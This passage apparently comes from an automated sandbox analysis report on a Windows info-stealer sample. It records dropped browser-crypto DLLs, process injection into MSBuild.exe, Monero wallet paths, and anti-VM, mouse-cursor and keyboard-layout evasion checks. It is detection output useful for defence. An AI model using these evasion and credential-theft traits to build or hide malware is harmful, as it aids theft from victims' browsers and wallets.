Source: VmRHSCaiyc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: VmRHSCaiyc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: VmRHSCaiyc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: VmRHSCaiyc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: VmRHSCaiyc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000005.00000002.1817684509.000000006D63D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.5.dr, freebl3[1].dll.5.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.5.dr, freebl3[1].dll.5.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000005.00000002.1800280648.00000000381EE000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.5.dr, vcruntime140.dll.5.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000005.00000002.1794363422.000000002C30A000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.5.dr, msvcp140[1].dll.5.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000005.00000002.1817684509.000000006D63D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr

Source: VmRHSCaiyc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: VmRHSCaiyc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: VmRHSCaiyc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: VmRHSCaiyc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: VmRHSCaiyc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00418ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_00418ADE

PE file contains sections with non-standard names

Source: sql[1].dll.5.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.5.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.5.dr	Static PE information: section name: .00cfg
Source: msvcp140[1].dll.5.dr	Static PE information: section name: .didat
Source: softokn3[1].dll.5.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.5.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.5.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.5.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.5.dr	Static PE information: section name: .didat
Source: softokn3.dll.5.dr	Static PE information: section name: .00cfg
Source: nss3.dll.5.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AC1AA push ecx; ret	4_2_003AC1BD
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003571AD push ecx; ret	4_2_003571C0
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AC56A push cs; retn 0003h	4_2_003AC58D
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AC5D6 push 800003C3h; ret	4_2_003AC5DD
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AC654 push cs; retf 0003h	4_2_003AC655
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AEBED push 0000004Ch; iretd	4_2_003AEBFE
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0039AE1D push ecx; ret	4_2_0039AE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0042F2D2 push ecx; ret	5_2_0042F2E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00422EC9 push esi; ret	5_2_00422ECB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041DF45 push ecx; ret	5_2_0041DF58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00432715 push 0000004Ch; iretd	5_2_00432726
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D71AD push ecx; ret	15_2_002D71C0

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\HCFIIIJJKJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\a43486128347[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\HCFIIIJJKJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

5_2_00418ADE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.37dad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.37dad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VmRHSCaiyc.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6192, type: MEMORYSTR

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\vmrhscaiyc.exe

Event Logs and Signature results: Application crash and keyboard check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: VmRHSCaiyc.exe, MSBuild.exe	Binary or memory string: DIR_WATCH.DLL
Source: MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: VmRHSCaiyc.exe, MSBuild.exe	Binary or memory string: SBIEDLL.DLL
Source: VmRHSCaiyc.exe, MSBuild.exe	Binary or memory string: API_LOG.DLL

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

5_2_0040180D

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	API coverage: 4.0 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 5.3 %
Source: C:\ProgramData\HCFIIIJJKJ.exe	API coverage: 4.2 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7772	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 7916	Thread sleep count: 76 > 30			Jump to behavior

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

